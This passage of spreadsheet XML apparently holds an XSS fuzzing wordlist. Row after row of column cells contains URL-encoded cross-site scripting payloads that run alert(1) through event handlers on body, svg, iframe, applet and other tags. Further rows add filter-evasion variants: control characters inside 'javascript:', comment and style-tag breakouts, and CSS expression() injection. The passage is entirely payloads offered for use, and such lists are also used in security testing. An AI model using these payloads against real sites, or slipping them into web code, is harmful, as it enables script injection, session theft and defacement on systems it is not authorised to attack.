      <c r="B1388" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseEnter%20body%20onMouseEnter%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseEnter%3E</v>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B1389" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onFocus%20body%20onFocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onFocus%3E</v>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B1390" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onScroll%20frameset%20onScroll%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onScroll%3E</v>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B1391" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20onReadyStateChange%20script%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fscript%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="3" t="s">
        <v>48</v>
      </c>
      <c r="B1392" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseUp%20html%20onMouseUp%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseUp%3E</v>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B1393" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPropertyChange%20body%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="3" t="s">
        <v>50</v>
      </c>
      <c r="B1394" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onLoad%20svg%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onLoad%3E</v>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B1395" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPageHide%20body%20onPageHide%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPageHide%3E</v>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="3" t="s">
        <v>52</v>
      </c>
      <c r="B1396" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseOver%20body%20onMouseOver%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseOver%3E</v>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B1397" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onUnload%20body%20onUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onUnload%3E</v>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="3" t="s">
        <v>54</v>
      </c>
      <c r="B1398" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onLoad%20body%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onLoad%3E</v>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B1399" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20onPropertyChange%20bgsound%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbgsound%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="3" t="s">
        <v>56</v>
      </c>
      <c r="B1400" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseLeave%20html%20onMouseLeave%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseLeave%3E</v>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="3" t="s">
        <v>57</v>
      </c>
      <c r="B1401" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseWheel%20html%20onMouseWheel%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseWheel%3E</v>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="3" t="s">
        <v>58</v>
      </c>
      <c r="B1402" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20onLoad%20style%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fstyle%20onLoad%3E</v>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B1403" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onReadyStateChange%20iframe%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="3" t="s">
        <v>60</v>
      </c>
      <c r="B1404" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPageShow%20body%20onPageShow%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPageShow%3E</v>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B1405" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20onReadyStateChange%20style%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fstyle%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="3" t="s">
        <v>62</v>
      </c>
      <c r="B1406" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onFocus%20frameset%20onFocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onFocus%3E</v>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B1407" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onError%20applet%20onError%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onError%3E</v>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="3" t="s">
        <v>64</v>
      </c>
      <c r="B1408" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onStart%20marquee%20onStart%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fmarquee%20onStart%3E</v>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B1409" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20onLoad%20script%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fscript%20onLoad%3E</v>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="3" t="s">
        <v>66</v>
      </c>
      <c r="B1410" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseOver%20html%20onMouseOver%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseOver%3E</v>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B1411" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseEnter%20html%20onMouseEnter%3D%22javascript%3Aparent.javascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseEnter%3E</v>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="3" t="s">
        <v>68</v>
      </c>
      <c r="B1412" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onBeforeUnload%20body%20onBeforeUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onBeforeUnload%3E</v>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="3" t="s">
        <v>69</v>
      </c>
      <c r="B1413" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseDown%20html%20onMouseDown%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseDown%3E</v>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="3" t="s">
        <v>70</v>
      </c>
      <c r="B1414" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onScroll%20marquee%20onScroll%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fmarquee%20onScroll%3E</v>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="3" t="s">
        <v>71</v>
      </c>
      <c r="B1415" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20onPropertyChange%20xml%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fxml%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="3" t="s">
        <v>72</v>
      </c>
      <c r="B1416" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onBlur%20frameset%20onBlur%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onBlur%3E</v>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="3" t="s">
        <v>73</v>
      </c>
      <c r="B1417" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onReadyStateChange%20applet%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="3" t="s">
        <v>74</v>
      </c>
      <c r="B1418" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onUnload%20svg%20onUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onUnload%3E</v>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="3" t="s">
        <v>75</v>
      </c>
      <c r="B1419" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseOut%20html%20onMouseOut%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseOut%3E</v>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="3" t="s">
        <v>76</v>
      </c>
      <c r="B1420" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseMove%20body%20onMouseMove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseMove%3E</v>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="3" t="s">
        <v>77</v>
      </c>
      <c r="B1421" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onResize%20body%20onResize%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onResize%3E</v>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="3" t="s">
        <v>78</v>
      </c>
      <c r="B1422" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onError%20object%20onError%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fobject%20onError%3E</v>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="3" t="s">
        <v>79</v>
      </c>
      <c r="B1423" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPopState%20body%20onPopState%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPopState%3E</v>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="3" t="s">
        <v>80</v>
      </c>
      <c r="B1424" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseMove%20html%20onMouseMove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseMove%3E</v>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="3" t="s">
        <v>81</v>
      </c>
      <c r="B1425" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onreadystatechange%20applet%20onreadystatechange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onreadystatechange%3E</v>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="3" t="s">
        <v>82</v>
      </c>
      <c r="B1426" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onpagehide%20body%20onpagehide%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onpagehide%3E</v>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="3" t="s">
        <v>83</v>
      </c>
      <c r="B1427" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onunload%20svg%20onunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onunload%3E</v>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B1428" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onerror%20applet%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onerror%3E</v>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="3" t="s">
        <v>85</v>
      </c>
      <c r="B1429" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onkeyup%20body%20onkeyup%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onkeyup%3E</v>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="3" t="s">
        <v>86</v>
      </c>
      <c r="B1430" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onunload%20body%20onunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onunload%3E</v>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="3" t="s">
        <v>87</v>
      </c>
      <c r="B1431" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onload%20iframe%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onload%3E</v>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="3" t="s">
        <v>88</v>
      </c>
      <c r="B1432" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%20body%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onload%3E</v>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="3" t="s">
        <v>89</v>
      </c>
      <c r="B1433" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onmouseover%20html%20onmouseover%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onmouseover%3E</v>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="3" t="s">
        <v>90</v>
      </c>
      <c r="B1434" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onbeforeload%20object%20onbeforeload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fobject%20onbeforeload%3E</v>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="3" t="s">
        <v>91</v>
      </c>
      <c r="B1435" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onbeforeunload%20body%20onbeforeunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onbeforeunload%3E</v>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="3" t="s">
        <v>92</v>
      </c>
      <c r="B1436" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onfocus%20body%20onfocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onfocus%3E</v>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="3" t="s">
        <v>93</v>
      </c>
      <c r="B1437" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onkeydown%20body%20onkeydown%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onkeydown%3E</v>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="3" t="s">
        <v>94</v>
      </c>
      <c r="B1438" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onbeforeload%20iframe%20onbeforeload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onbeforeload%3E</v>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="3" t="s">
        <v>95</v>
      </c>
      <c r="B1439" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%20iframe%20src%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20src%3E</v>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="3" t="s">
        <v>96</v>
      </c>
      <c r="B1440" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onload%20svg%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onload%3E</v>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="3" t="s">
        <v>97</v>
      </c>
      <c r="B1441" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onmousemove%20html%20onmousemove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onmousemove%3E</v>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="3" t="s">
        <v>98</v>
      </c>
      <c r="B1442" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onblur%20body%20onblur%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onblur%3E</v>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="3" t="s">
        <v>99</v>
      </c>
      <c r="B1443" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="s">
        <v>100</v>
      </c>
      <c r="B1444" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%60%3E%3Cscript%3E%2F%2A%20%2A%5Cx2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="3" t="s">
        <v>101</v>
      </c>
      <c r="B1445" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0D</v>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="3" t="s">
        <v>102</v>
      </c>
      <c r="B1446" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0A</v>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="3" t="s">
        <v>103</v>
      </c>
      <c r="B1447" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0B</v>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="3" t="s">
        <v>104</v>
      </c>
      <c r="B1448" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20charset%3D%22%5Cx22%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="3" t="s">
        <v>105</v>
      </c>
      <c r="B1449" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Cx3E%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="3" t="s">
        <v>106</v>
      </c>
      <c r="B1450" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20---%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="3" t="s">
        <v>107</v>
      </c>
      <c r="B1451" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx00%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="3" t="s">
        <v>108</v>
      </c>
      <c r="B1452" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx21%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="3" t="s">
        <v>109</v>
      </c>
      <c r="B1453" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx3E%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="3" t="s">
        <v>110</v>
      </c>
      <c r="B1454" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3D%27%23%5Cx27%20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="3" t="s">
        <v>111</v>
      </c>
      <c r="B1455" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="s">
        <v>112</v>
      </c>
      <c r="B1456" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3E%3Cp%3E%3Csvg%3E%3Cscript%3Ea%3D%27hello%5Cx27%3Bjavascript%3Aalert%281%29%2F%2F%27%3B%3C%2Fscript%3E%3C%2Fp%3E%3Ca%20href%3Djavas%5Cx00cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="3" t="s">
        <v>113</v>
      </c>
      <c r="B1457" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx07cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="3" t="s">
        <v>114</v>
      </c>
      <c r="B1458" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Dcript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="3" t="s">
        <v>115</v>
      </c>
      <c r="B1459" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Acript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="3" t="s">
        <v>116</v>
      </c>
      <c r="B1460" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx08cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="3" t="s">
        <v>117</v>
      </c>
      <c r="B1461" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx02cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="3" t="s">
        <v>118</v>
      </c>
      <c r="B1462" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx03cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="3" t="s">
        <v>119</v>
      </c>
      <c r="B1463" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx04cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="3" t="s">
        <v>120</v>
      </c>
      <c r="B1464" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx01cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="3" t="s">
        <v>121</v>
      </c>
      <c r="B1465" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx05cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="3" t="s">
        <v>122</v>
      </c>
      <c r="B1466" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Bcript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="3" t="s">
        <v>123</v>
      </c>
      <c r="B1467" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx09cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="3" t="s">
        <v>124</v>
      </c>
      <c r="B1468" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx06cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="3" t="s">
        <v>125</v>
      </c>
      <c r="B1469" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Ccript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="3" t="s">
        <v>126</v>
      </c>
      <c r="B1470" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2F%2A%20%2A%5Cx2A%2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="3" t="s">
        <v>127</v>
      </c>
      <c r="B1471" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2F%2A%20%2A%5Cx00%2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="3" t="s">
        <v>128</v>
      </c>
      <c r="B1472" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx3E%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="3" t="s">
        <v>129</v>
      </c>
      <c r="B1473" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx0D%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="3" t="s">
        <v>130</v>
      </c>
      <c r="B1474" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx09%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="3" t="s">
        <v>131</v>
      </c>
      <c r="B1475" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx20%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="3" t="s">
        <v>132</v>
      </c>
      <c r="B1476" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx0A%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="s">
        <v>133</v>
      </c>
      <c r="B1477" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3EABC%3Cdiv%20style%3Dfont-family%3A%27foo%27%5Cx7Dx%3Aexpression%28javascript%3Aalert%281%29%3B%2F%2A%27%3B%22%3EDEF</v>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="s">
